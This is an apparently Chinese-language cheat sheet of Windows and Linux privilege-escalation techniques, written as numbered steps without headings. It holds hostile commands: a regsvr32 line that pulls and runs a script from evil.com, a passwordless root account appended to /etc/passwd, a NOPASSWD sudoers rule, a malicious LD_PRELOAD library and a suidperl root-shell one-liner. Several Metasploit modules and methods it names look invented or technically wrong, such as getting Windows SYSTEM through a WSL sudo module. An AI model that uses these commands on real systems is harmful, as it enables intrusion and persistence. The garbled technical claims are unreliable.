1.执行whoami /priv命令,查看当前用户是否拥有SeImpersonatePrivilege权限。
2.如果拥有权限,使用Impersonate-User脚本提权。该脚本会创建一个新的进程,并使用当前用户的权限执行该进程。
3.如果没有该权限,使用PowerUp脚本,该脚本会检测系统中是否存在可利用的漏洞,并提供相应的利用方法。
1.找到可劫持的DLL文件,如“user32.dll”。
2.创建恶意DLL文件,并将其重命名为“user32.dll”。
3.将恶意DLL文件放置在系统目录下,等待用户或系统调用“user32.dll”时,恶意DLL文件会被加载,从而可以获得系统权限。
1.执行whoami /groups命令,查看当前用户所属的组。
2.利用PsExec工具,执行命令psexec -i -d -s cmd.exe,可以获得一个System权限的命令行窗口。
3.在命令行窗口中执行whoami /groups命令,可以看到当前用户已经拥有System权限的token。
1.使用schtasks /query命令查看当前系统中的计划任务。
2.找到一个可利用的计划任务,如“System Restore Checkpoint”任务。
3.利用Metasploit框架中的exploit/windows/local/schtasks模块,可修改该任务的参数,从而获得系统权限。
1.执行msiexec /i命令,安装一个恶意的MSI文件。
2.在安装过程中,会自动创建一个System权限的进程。
3.利用该进程,可以执行任意的命令,从而获得系统权限。
1.使用sc或net start命令查看当前正在运行的服务。
2.找到一个可利用的服务,如“Print Spooler”服务。
3.利用Metasploit框架中的exploit/windows/local/service_permissions模块,可提升该服务的权限,从而获得系统权限。
1.Windows系统中安装Windows Subsystem for Linux(WSL)。
2.在WSL中安装Metasploit框架。
3.利用Metasploit框架中的exploit/linux/local/sudo模块,可提升当前用户的权限,从而获得系统权限。
1.执行regsvr32 /s /u /i:https://evil.com/evil.sct scrobj.dll命令,注入一个恶意的COM脚本。
2.注入成功后,会自动执行该脚本,并创建一个System权限的进程。
3.利用该进程,可以执行任意的命令,从而获得系统权限。
1.执行systeminfo命令,查看当前系统的信息。
2.找到一个可利用的漏洞,如CVE-2019-1458漏洞。
3.利用Metasploit框架中的exploit/windows/local/kernel模块,可利用该漏洞提升当前用户的权限,从而获得系统权限。
1.执行wmic service list brief命令,查看当前正在运行的服务。
2.找到一个可利用的服务,如“Winmgmt”服务。
3.利用Metasploit框架中的exploit/windows/local/wmi模块,可提升该服务的权限,从而获得系统权限。
1.查找具有SUID权限的文件:find / -perm -4000 -type f 2>/dev/null
2.查看这些文件是否有漏洞:strings /usr/bin/sudo | grep "^"、strings /usr/bin/passwd | grep "^"
3.找到一个有漏洞的文件,利用漏洞获取root权限
1.查看内核版本:uname -a
2.查找内核漏洞:searchsploit Linux Kernel
3.找到一个有漏洞的内核,利用漏洞获取root权限。
1.在/etc/passwd中添加一个新用户:echo "hacker::0:0:hacker:/root:/bin/bash" >> /etc/passwd
2.切换到新用户:su hacker
3.获取root权限:sudo su
1.编写一个恶意的共享库:cat > rootkit.c << EOF、gcc -shared -o rootkit.so rootkit.c
2.设置LD_PRELOAD环境变量:export LD_PRELOAD=/path/to/rootkit.so
3.运行一个程序,就能够以root权限运行:sudo /usr/bin/vim
1.查看是否存在可利用的sudoers文件:cat /etc/sudoers、cat /etc/sudoers.d/*
2.如果存在可利用的sudoers文件,就可以添加一条提权规则:echo "hacker ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
3.切换到hacker用户,就能够以root权限运行:sudo su
1.查找系统中的敏感文件:find / -name *.txt -o -name *.log -o -name *.conf -o -name *.sh
2.查看这些文件是否有漏洞,是否包含root密码等信息。
3.利用这些信息获取root权限。
1.查看正在运行的系统服务:ps aux | grep root
2.查找这些服务是否有漏洞:searchsploit
3.找到一个有漏洞的服务,利用漏洞获取root权限。
1.查看/etc/shadow文件是否有漏洞:cat /etc/shadow
2.如果存在可利用的漏洞,就可以利用漏洞获取root权限。
1.查找系统中是否安装suidperl:find / -name suidperl 2>/dev/null
2.如果存在suidperl,可利用漏洞获取root权限:suidperl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'